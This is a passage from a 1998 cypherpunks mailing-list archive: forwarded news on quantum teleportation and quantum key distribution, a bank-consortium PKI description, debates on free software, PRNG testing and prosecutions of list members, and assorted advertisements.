could do would be to fire everyone in RSADSI, and use the monsy that would
be spent on their salaries to invest heavily in smart cards.

A

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 00:25:10 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Teleportation Study: Beam Me Up Scotty...
Message-ID: <v04020a08b25655461819@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Fri, 23 Oct 1998 07:40:16 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Teleportation Study: Beam Me Up Scotty...
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  CNN
http://cnn.com/TECH/science/9810/22/science.teleport.reut/

Spooky teleportation study brings future closer

October 22, 1998
Web posted at: 4:50 PM EDT

WASHINGTON (Reuters) - They may not be able to ask Scotty to beam them up
yet, but California researchers
said Thursday they had completed the first "full" teleportation experiment.

They said they had teleported a beam of light across a laboratory bench.
They did not physically transport the
beam itself, but transmitted its properties to another beam, creating a
replica of the first beam.

"We claim this is the first bona fide teleportation," Jeff Kimble, a
physics professor at the California Institute of Technology, said in a
telephone interview.

Kimble thinks the experiment can eventually transform everyday life.

Scientists hope that quantum computers, which move information about in
this way rather than by using wires and silicon chips, will be infinitely
faster and more powerful than present-day computers.

"I believe that quantum information is going to be really important for our
society, not in five years or 10 years, but if we look into the 100-year
time frame it's hard to imagine that advanced societies don't use quantum
information," Kimble said.

"The appetite of society is so voracious for the moving and processing of
information that it will be driven to exploit even the crazy realm of
quantum physics."

Quantum teleportation allows information to be transmitted at the speed of
light -- the fastest speed possible -- without being slowed down by wires
or cables.

The experiment depends on a property known as entanglement -- what Albert
Einstein once described as "spooky action at a distance."

It is a property of atomic particles that mystifies even physicists.
Sometimes two particles that are a very long distance apart are nonetheless
somehow twinned, with the properties of one affecting the other.

"Entanglement means if you tickle one the other one laughs," Kimble said.

In the weird world of quantum physics, where the normal ideas of what is
solid or what is real do not apply, scientists can use these properties to
their advantage.

What Kimble's team did was create two entangled light beams -- streams of
photons. Photons, the basic unit of light, sometimes act like particles and
sometimes like waves.

They used these two entangled beams to carry information about the quantum
state of a third beam. The first two beams were destroyed in the process,
but the third successfully transmitted its properties over a distance of
about a yard , Kimble's team reported in the journal Science.

Last December a team of physicists in Innsbruck, Austria and a month later
another team in Rome said they did a similar thing, with single photons.
But Kimble said his team was able to verify what they had done, and also
used full light beams as opposed to single photons.

"Ours is an important advance beyond that," he said.

Although the Caltech team worked with light, Kimble thinks teleportation
could be applied to solid objects. For instance, the quantum state of a
photon could be teleported and applied to a particle, even to an atom.

"Way beyond sex change operations and genetic engineering, the quantum
state of one entity could be transported to another entity," Kimble said.
"We think we know how to do that."

In other words, an object's individual atoms would not be transported, but
transmitting its properties could create a perfect replica.

Could this mean the transporters of the television and movie
science-fiction series Star Trek, which beam people and objects for huge
distances, could one day be a reality?

"I don't think anybody knows the answer," Kimble said. "Let's don't
teleport a person -- let's teleport the smallest bacterium. How much
entanglement would we need to teleport such a thing?"

Would such a teleported bacterium actually be the same bacterium, or just a
very good copy?

"Again, no one knows for sure," Kimble said. But his team is working on it.

Copyright 1998 Reuters Limited. All rights reserved.
 (c) 1998 Cable News Network, Inc. All Rights Reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Sat, 24 Oct 1998 02:29:52 +0800
To: blake@wizards.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <004801bdf3a1$f168e6b0$b401010a@is_blake.wizards.com>
Message-ID: <199810231755.LAA18635@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    This assumes that writing and selling proprietary software is 'the
    ability to control other people'.

Making a program proprietary is controlling people, pure and simple.
It is a matter of restricting users from sharing, studying and/or
changing the program--restricting users from cooperating.

    but people *choose* to accept the restrictions of non-free
    software for any number of reasons.

People often choose to give up important freedoms--usually because
they are offered a limited choice, and the other alternatives seem to
involve short-term pain.  One can understand why people do this, but
the effects are still dangerous.  When almost everyone gives up
certain freedoms, those few who keep them may be subject to various
sorts of pressure that only a few determined people would resist.

The crucial question is not whether people had some limited range of
choice available.  It is, what limited the choice?  Was it limited by
nature, or did someone deliberately deny people the other better
choices?  And if so, was that wrong?

      I do not see anyone being coerced into
    using it by threat of physical force.

Physical force is not the only thing that can hurt people or
systematically degrade society, so whether it is employed not a
crucial issue.  But, as it happens, physical force generally does play
a role in proprietary software.  Most proprietary software developers
make use of laws that place the power of the state at their service in
stopping users from sharing.

Using physical force is sometimes justified--for example, to prevent a
wrong.  In this spirit, copyleft uses laws and state power to prevent
others from using the very same laws and power to restrict users.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 01:05:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cryptographic Dog Stocks, The Dirigible Biplane, and  Sendingthe  Wizards Back to Menlo Park
In-Reply-To: <v04003a08b2551ff61c93@[198.115.179.81]>
Message-ID: <v04020a09b2565899e05a@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:19 AM -0400 on 10/23/98, Tim May wrote:

> I've been a critic of some of Bob's "exuberance," his tendency to go off on
> rhetorical flights of fancy, his irritating "ums" and "ers" and ":-}"s, and
> his generally opaque writing style.

No accounting for taste, or the lack thereof, for that matter.

> I think there's a kernel of good thinking in there, but his attention seems
> to flit about. And he seems more interesting in cutesy turns of phrase than
> in persuasive exposition.

What? "Too many notes", Signore Solieri? :-).


> If there's stuff there, it's lost in the freneticism.

Don't worry, Tim, you know it all already. Everything I ever learned on
this stuff, I learned from you, anyway.

Execpt the finance, of course. :-).

You know where the 'd' key is, and I bet you even know how to use your
killfile, if you tried.


> I guess some folks are amazed that anyone can write the way Bob does. Me, I
> was never amazed by the writings of Detweiler, Toto, or Hettinga.

Right back atcha Tim. And don't forget to shoot back at the Feds when they
fly the black helicopters over your house. Otherwise, they might not even
know you're there, hmmm?

Oh, well. You can't always pick your friends. Or your friend's nose, for
that matter. <Ewwwwww...>

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 01:09:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: bank cosortium to form CA
Message-ID: <v04020a0cb2565e6b3ecb@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 23 Oct 1998 00:38:10 -0400 (EDT)
From: Rich Salz <salzr@certco.com>
To: cryptography@c2.net
Subject: Re: bank cosortium to form CA
Sender: owner-cryptography@c2.net

I seem to have gotten myself dropped from the list, but luckily a
friend forwarded (part of?) Steve's posting and Ben's (snarky :)
followup.  Let me try to give some details.  The WSJ had a one-day
exclusive, and their coverage was (from our perspective ;) not the
best.  You can find some other (free) coverage at www.wired.com,
http://www.americanbanker.com/cgi-bin/read_intrastory?981021TECH999,
and www.businesswire.com (sorry I don't have all the URL's convenient).

Here's some details.  I am not an official CertCo spokesman.
Official press contacts can get contact info and collatoral from
www.certco.com.  The following comes from our press release,
supporting Q&A, etc.

We're creating a new company (name being chosen; I'll call it GTO
for global trust organization -- the PR says enterprise, but GTE
is already in use :).  The GTO is aiming for online *business-to-business*
commerce.  The B2B point is key:  we're in the high-value commercial
transaction area.  Don't think buying some books from amazon.com,
think of Texas buying all their textbooks.

The GTO will be running a root CA and a "repository" where the CA
will publish its certs and CRL's.  The root will use CertCo's
RootAuthority.  Our Multi-Step signing can take a private key and
split it into a set of keyps called fragments.  We then destroy
the original key.  When enough fragments sign something (quorum
determined at the time the fragments are generated, and are usually
like "5 of 7"), those signatures can be combined (mathematically)
and the result looks like it was signed by the initial key.  So we
can take a key, spread its fragments around the world, and have a
very secure root.  That's step one.

Step two is the root CA will certify CA's for member banks.  These
are big global banks each having billions in assets.  (The initial
eight banks are ABN Amro, Bank of America, Bankers Trust, Barclays
Bank, Chase Manhattan, Citibank, Deutsche Bank, and Hypo Vereinsbank.
Others have expressed interest in joining.)  These banks will issue
certs -- 1K keys initially, on smartcards -- to personnel at their
corporate customers.  The rules by which these banks issue these
cards, how the companies and employees treat the cards, notify
banks in case of turnover or compromise, etc., are all part of
joining.  We call these the "system rules."  It's way more than a
CPS (certification practice statement); it is a common contractual
arrangement that the banks and their customers will all be issuing
and handling and processing certs/cards in the same way.  That's
step two.

This step is perhaps the most important.  If someone at Tire Supplier
receives a signed email message from someone at Car Maker, and they
can see that CM's cert is within the GTO PKI, then they can trust
it as much as they trust their own certs.

Step three is online verification.  TS can present the CM's cert
to their bank and get verification that the cert is valid.  TS's
bank can trust CM's bank because of the common adherance to the
rules.  One of the rules for joining is that you treat peer banks
with as much trust as you trust yourself, provided they can be
shown to be following the rules.  Or perhaps shown to not be breaking
the rules. :)

The GTO believes businesses will trust these decisions to their
banks; that they'll pay the banks to manage the risk of trusting
the identities to which the certs attest.  (Hence, the for-profit
intent :)

Step four.  Now, suppose CarMaker sends a "request to buy US$1M
worth of tires" to TireSupplier.  TS can send CM's cert, a hash of
the message, and a request for "assurance" to his (TS's) bank.  TS
can decide that their exposure, should CM prove to not be who the
certificate claim, is US$100K.  So TS asks his bank for $100K assurance,
for a period of 30 days.  If it turns out that, say someone stole
CM's cert, or CM left the company and is now working somewhere else
buy using old credentials, or CM's bank didn't issue the CRL in a
timely manner, etc., TS's bank will pay TS the US$100K.  The system
rules include procedures for due diligence, arbitration, and (last
resort) legal recourse should TS need to "file a claim" on their
assurance.

Or, to put it in terms of the PR materials, business partners can
get warranties on the identity of their trading partners online,
over the Internet, as a new service from their bank.

Step five is to extend the hierarchy down so that the big banks
can "charter" or "sponsor" smaller banks.  The L1 might be a service
bureau for the L2's, an L2 might have its own CA, etc...

It is the GTO's plan to publish our certificate profiles (derived
from PKIX), directory schemas, system rules, network protocols,
smartcard requirements, etc.  It will be an open system

I can't talk about schedules, other than to say it's very aggressive. :)

If you're in the Boston area, Dan Geer will be giving a talk on
this at the November meeting of the Digital Commerce Society of
Boston, For more info, send "info dcsb" in the body of a message
to <mailto:majordomo@ai.mit.edu> . If you want to subscribe to
the DCSB e-mail list, send "subscribe dcsb" in the body of a message
to <mailto:majordomo@ai.mit.edu> .

Hope this helps.  I'll be out of the office Friday, but will try to answer
any questions I can next week.
	/r$

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 Oct 1998 01:53:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810231733.MAA12984@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 23 Oct 1998 16:40:03 -0000
> From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
> Subject: Re: Women cannot commit rape? (fwd)

> > > This is true in the United States as well.  That's why in every state,
> > 
> > I don't believe that is accurate. Just about 2 years ago two women were
> > sentenced to prison because they kidnapped and raped a man.
> > 
> > Perhaps one of the more versed in case law members might remember it.
> > 
> 
> Could it have involved penetration with a blunt object? That would be
> more forceful than the "rape" in the French case that started the thread.

As I remember the case two women kidnapped and sexualy assaulted a
hitchhiker. Their defence was that it wasn't possible to rape man against
his will. The jury found them guilty of the charge.

I don't have a lot of spare time right now (I've had 3 full days off in the
last 6 weeks and have to work Sunday) so I am unable to follow up and
find the specifics.

If nobody happens to remember it we might table it until I can get the time
to find the specifics.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 01:51:54 +0800
To: cypherpunks@cyberpass.net
Subject: Practical Free-Space Quantum Key Distribution over 1 km
Message-ID: <v04020a0db25668faba5c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: cryptography@c2.net
Cc: gs.satellite@Qualcomm.com, gs.security@Qualcomm.com
Subject: Practical Free-Space Quantum Key Distribution over 1 km
From: Paul Pomes <ppomes@Qualcomm.com>
Organization: Qualcomm, Inc.
X-url: <http://people.qualcomm.com/ppomes/>
X-PGP-Key: <http://pgp5.ai.mit.edu:11371/pks/lookup?op=get&search=0x9EF97D4D>
MIME-Version: 1.0
Date: Fri, 23 Oct 1998 08:04:51 -0700
Sender: owner-cryptography@c2.net

W.T. BUTTLER et al: Practical Free-Space Quantum Key Distribution over 1 km
Physical Review Letters, vol 81, no 15, pp 3051-3301 (1998).
<http://ojps.aip.org/journal_cgi/getpdf?KEY=PRLTAO&cvips=PRLTAO00008100001500328
3000001>

Abstract:

A working free-space quantum key distribution system has been developed and
tested over an outdoor optical path of ~ 1 km at Los Alamos National
Laboratory under nighttime conditions.  Results show that free-space quantum
key distribution can provide secure real-time key distribution between
parties who have a need to communicate secretly.  Finally, we examine the
feasibility of surface to satellite quantum key distribution.

/pbp

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Sat, 24 Oct 1998 06:34:46 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <3.0.5.32.19981023145454.008dd100@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:00 AM 10/23/98 +0200, Mok-Kong Shen wrote:
>David Honig wrote:
>
>> Recall that Ueli's Universal Statistical Test
>> is valid only for real sources of entropy.
>> PRNGs have zero entropy asymptotically ;-)
>
>Sorry that I haven't yet understood. Could you explain a bit more
>from the entropy point of view? In my opinion, a statistical
>test does not and should not take into account how a sequence
>being tested is obtained. Given is simply a sequence and no other
>information and the test should give an answer.
>
>M. K. Shen

A *sequence* isn't random; a process is.   A sequence may be the result of
some process, but its always a sample of a process.

When you ask, "Is some process random", you *must* define "random"
operationally, thus, finitely.



A test for structure, such as Marsaglia's "Diehard" suite, 
measures various statistics (structure) of a sample and compares
them to the measurements you'd get for (abstractly modelled, "real")
randomness.  If the particular tests you've chosen 
don't see some structure that's present in the sample, you'll mistakenly 
accept the process as "random".  Diehard is nice because it includes
complex stats and some Monte Carlo evaluations.

Marsaglia's test was designed to find problems in PRNGs, which he was
working on.

Maurer suggests a way to compute the entropy of the data, taken as N-bit
blocks, and computes the value you'd compute for random data.  His test
consumes a lot more data, and is 

Now, a PRNG has a finite amount of (unknown) initial internal state.
This state is expanded into the output stream, which goes on forever,
thus the finite initial entropy is spread infinitestimally thin.

A true RNG, even an imperfect one, generates a constant amount of entropy
per symbol ("bit per baud" averaged over any sufficiently large window).

-----------------
An experiment

Run a block cipher in a feedback mode, generating a large data file.
Any good cipher will pass Diehard's tests for structure.  So will
a true random file.  

(I've posted directions for producing decent true randomness from
a detuned FM radio, soundcard, and 8->1 parity-reduction filtering.)

Now run Maurer's test; I've posted a version for blocksize = 16.  
The cipher-PRNG output will not have the entropy expected for randomness.
The physical-random file will.


-----------------------------

D. Honig

"When horsemeat is outlawed, only outlaws will eat horsemeat"
	--California Voter Information Pamphlet













  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Fri, 23 Oct 1998 23:53:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rules of engagement
Message-ID: <19981023152002.24725.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain




Adam Back wrote:
> 
> Re. the discussion of things like "first they came for Jim Bell, but I
> didn't speak up because I wasn't a tax protester, and then they came
> for Toto but I didn't speak up because I'm not crazy", etc.
> 
> The rules of the game from what I can see is that if one is outspoken,
> one either needs to be squeaky clean, or have enough funds to hire
> good lawyers, or to be anonymous.

[Notwithstanding my preference for the latter]...

Is it the cypherpunk response to back off with our tail between our legs?
I hope not.

I smiled when I read about Toto's plans to appear in court in a perl-RSA
T-shirt. Toto has balls so big he needs a wheel barrow to get around.

> That is to say, I suspect that Jim would not have been locked up if he
> had not a) used false social security numbers, b) not been involved
> with fake courts, c) not collected IRS employees home addresses, and
> d) not planted the stink bomb.

And, more importantly, if crypto-anachy and removal of governments weren't
on the cypherpunk agenda. Lets not pretend that Jim and Toto (and to a lesser
degree the scrutinee J Choate) are not scapegoats for all of our opinions.

> The AP rants are perfectly defensible free speech and free-wheeling
> political discussion.

Yes. "defensible", but they weren't defended. Jim pleaded. As would anyone
in the face of sufficient pressure.

> Similarly with Toto, the rants would have been ok, without a) the
> mockup non-functional "bomb" symbolically planted in the court house
> basement or where-ever it was, b) using real IRS employees, and judges
> names in his rant (apparently in support of Jim Bell), c) having
> tourettes syndrome.

The rants are ok anyway. They are clearly metaphors. But the prosecutors
aren't playing fair. The man is "dangerous". And not because he wrote "bomb"
in crayon on a cardboard box. But because he made waves. Waves that we caught.
Waves that the straights and sheeple might catch.

> His rants,
> when he was coherent, were well written, and humorously sarcastic
> observations about the increasingly facist state.
> 
> Just an observation.

Just.

> Having blemishes, or being vulnerable in some way makes one an easy
> target for governments.  Tourettes syndrome clearly isn't helping
> Toto's case -- they can basically lock him up as "crazy and dangerous"
> or whatever for as long as they like with no pretense of trial or
> anything if it came to it.

I thought this might be because of his excessive use of metaphor rather
than a persecution of a medical condition unrelated to mental competence.

> Clearly I think one should be able to say wtf one wants to, and in
> general I endeavor to do just that.  But I am suggesting that
> cypherpunks individually stear clear of grey areas, such as ...
> Tim May style "I've got X number of now illegal armament Y",

I took the frequency of little Timmy May's 2nd ammendment rifs as a sign
that he was clean on that score. (Tim always seems to be a couple of steps
ahead).

> My comment is that cypherpunks might be trying to hasten the demise of
> the nation state by deployment of tools of identity and financial
> privacy so that the individual can free himself from the burdens of
> the state, but cypherpunks themselves (at least the non-anonymous
> ones) should be squeaky clean.
>
> Write code, let someone else do the tax protesting, gun law
> protesting, and let someone else have the personalised arguments with
> over-zealous government employees.
> 
> Financial privacy and anonymity code, is the most caustic
> anti-government expression one can utter.
> 
> Adam
> --

You seem a bit down at the end there.

> print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`

Illegal crypto export. That's more like it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Fri, 23 Oct 1998 23:42:39 +0800
To: John Gilmore <cypherpunks@Algebra.COM
Subject: Re: Gilmore Subpoena
Message-ID: <19981023152334.2292.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain




John Young wrote:
> 
> Source: Fax from John Gilmore
> 
> [Form]
> 
> AO 110 (Rev. 12/89) Subpoena to Testify Before Grand Jury
> _______________________________________________________________________
> 
>                      UNITED STATES DISTRICT COURT
>                     WESTERN DISTRICT OF WASHINGTON
> _______________________________________________________________________
> 
> To:
>     John Gilmore                    SUBPOENA TO TESTIFY
>     210 Clayton Street              BEFORE GRAND JURY
>     San Francisco, CA 94117
> 
>                               SUBPOENA FOR:
>                               [X] PERSON   [X] DOCUMENT(S) OBJECT(S)
> 
>  YOU ARE HEREBY COMMANDED to appear before the Grand Jury of the United
> States District Court at the place, date and time specified below.
> 
...
>  YOU ARE ALSO COMMANDED to bring with you the following document(s) or
> object(s):*
> 
>         c.   Any an all messages, correspondence, or e-mail,
>              received from or involving CARL JOHNSON, C.J. PARKER,
>              TOTO, TRUTHMONGER, A FIEND, to specifically include
>              correspondence received from CARL JOHNSON while he was
>              in Federal custody.

Please include _this_.

I herebery swear that I wrote all messages signed "Toto", "TruthMonger" and "A Fiend"
sent to the various cypherpunks lists and I am definitely *not*  CARL JOHNSON,
or C.J. PARKER.

Toto




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 04:24:39 +0800
To: cypherpunks@cyberpass.net
Subject: Human Action Gone
Message-ID: <v04020a0fb2568c2a0072@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Mises Institute News" <news@mises.org>
To: <miseslist@mises.org>
Subject: Human Action Gone
Date: Fri, 23 Oct 1998 13:53:07 -0500
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Precedence: bulk
Sender: miseslist-owner@mail.mises.org
Status: U

Thanks to an overwhelming response, our stock of other Human Action editions
is now gone.

The Scholar's Edition will be available November 23, 1998.

This is a re-release of the original, unaltered 1949 treatise that shaped a
generation of Austrians and made possible the intellectual movement that is
leading the global charge for free markets.

Made available for the first time in decades, exclusively through the Ludwig
von Mises Institute, this edition uses extraordinary materials and the best
of modern technology, combined with ancient standards of craftsmanship in
the tradition of Oxford University's Clarendon Press. This magnificent work
is produced for the ages.

 Carefully set in the classic, readable, and beautiful Jansen typeface,
including the 1954, 30-page index prepared under Mises's supervision, the
most extensive ever compiled;

 Printed on stunning pure white, acid-free Finch Fine 50 lb. paper;

 Covered in spectacular dark azure Odyssey cloth from the Netherlands, the
finest natural-finish, moisture-resistant book fabric in the world;

 Protected by a strong slipcase from the famous Old Dominion company,
covered in matching Odyssey cloth and featuring old-fashioned thumb-cuts for
easy handling;

 Secured by the finest caliper Binders Board;

 Graced with antique-stone endpapers from Ecologic Fibers;

 Casebound with the strongest Smyth-sewn signatures;

 Fitted at head and foot with silken endbands, thick wrapped for
durability;

 Complimented with a double-faced satin ribbon place marker, and portrait
of Mises;

 Stamped with brilliant, real non-tarnishing gold foil from Japan's Nakai
International;

 Produced at R.R. Donnelly's famed Crawfordsville Bindery, where America's
finest books are assembled.

All told, The Scholar's Edition looks exactly like the classic work it is,
ready for a lifetime (or two) of use. The introduction, by Hans-Hermann
Hoppe, Jeffrey Herbener, and Joseph Salerno-based on newly discovered
archives-tells of the tragic and glorious history of this seminal work, and
of its bright future as the manifesto of liberty.

Human Action: The Scholar's Edition is the foundation of every library of
freedom. You will want a treasured copy in your collection. And if you want
to send a copy as a gift to a friend or family member, we'll wrap it
appropriately at no charge, and enclose a card in your name.

The price for this nine-hundred-page masterpiece is $65. Your credit card
will
not be charge until the order is shipped. Call 800-636-4737, or order
securely through our on-line catalog at www.mises.org

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 23 Oct 1998 22:49:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Break DES Fast!
In-Reply-To: <90914889921502@cs26.cs.auckland.ac.nz>
Message-ID: <36309E91.6A5F6688@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Peter Gutmann wrote:
> 
> Dear Friend,
> 
> My name is Dave Rhodes.  In 1997 my cipher designs had all been broken, my

I don't know the English term but in my native language what is
described is call 'chaining letters', supposed to be a method to
become rich very rapidly. That was illegal, though.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: palmdevcon@palm.com
Date: Sat, 24 Oct 1998 08:07:16 +0800
To: cypherpunks@toad.com
Subject: Palm Computing Platform Worldwide Developer Conference: Register Today!
Message-ID: <199810232339.QAA06649@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Here it is...


It's not what you think....it's better.

You can't afford to miss the Palm Computing Platform Worldwide Developer
Conference, December 1-4, 1998, at the Santa Clara Convention Center.  Why?

During the conference, Palm Computing will unveil its Internet strategy.
You won't want to miss hearing how the company that's driving the future of
handheld computing will demonstrate how the net will never be the same.

You can also choose from more than 90 hours of keynote, business,
technical, and platform sponsor sessions. See major products from IBM,
Symbol Technologies, Qualcomm, Inc., and also attend sessions hosted by
each of companies along with other sponsors including Apple, Certicom, Lotus, Oracle, Puma, Sun, 
Sybase and TRG.

And discover for yourself why the Palm Computing platform really is the new
force in computing.

No wonder more than 10,000 developers are already providing software and
hardware solutions for the Palm Computing platform.

What are you waiting for? Register today!

For a detailed agenda and online registration, go to our conference
website: http://www.palmdevcon.com.


See you in December!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 24 Oct 1998 01:08:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Women cannot commit rape? (fwd)
Message-ID: <19981023164003.26281.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain





Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Wed, 21 Oct 1998 22:50:50 -0500
> > From: Kevin Elliott <k-elliott@wiu.edu>
> > Subject: Re: Women cannot commit rape?
> 
> > This is true in the United States as well.  That's why in every state,
> 
> I don't believe that is accurate. Just about 2 years ago two women were
> sentenced to prison because they kidnapped and raped a man.
> 
> Perhaps one of the more versed in case law members might remember it.
> 

Could it have involved penetration with a blunt object? That would be
more forceful than the "rape" in the French case that started the thread.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 06:03:19 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Data Encryption and the First Amendment: Pete duPont
Message-ID: <v04020a12b256a28b4367@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain





Hey *I* want some of the 4096 bit encryption!

:-).

Cheers,
Bob Hettinga

"My coun-try 'tis of thee, land of plu-to-cracy..."
Forbes/duPont 2000 ;-).

--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Fri, 23 Oct 1998 15:06:12 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Data Encryption and the First Amendment: Pete duPont
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Intellectual Capital
http://www.IntellectualCapital.com/issues/98/1022/iced.asp

 Data Encryption and the First Amendment
 by Pete du Pont
 October 22, 1998

 The microprocessor and the Internet have created an
 information revolution that is sweeping the globe.
 This revolution is putting information once available
 only to the media, political and intellectual elite into
 the kitchens of ordinary people all across America
 and opening previously locked cabinets in
 government, industry and academe.

 In short, the information revolution is empowering
 people; it is giving them the tools and the information to make informed
 choices for themselves. People can more easily exchange information
 with one another -- buy, sell, discuss and decide among different
 options.

 Already, e-mail exceeds regular mail usage by 10-to-1. Forrester
 Research reports that $8 billion in goods and services were traded
 over the Internet in 1997; by 2002, 21 million homes will be doing
 online financial transactions worth $327 billion.

 Essential to this commercial and personal communication is security.
 We want to know that our information travels safely, without alteration
 or eavesdropping, and that there is neither information theft nor identity
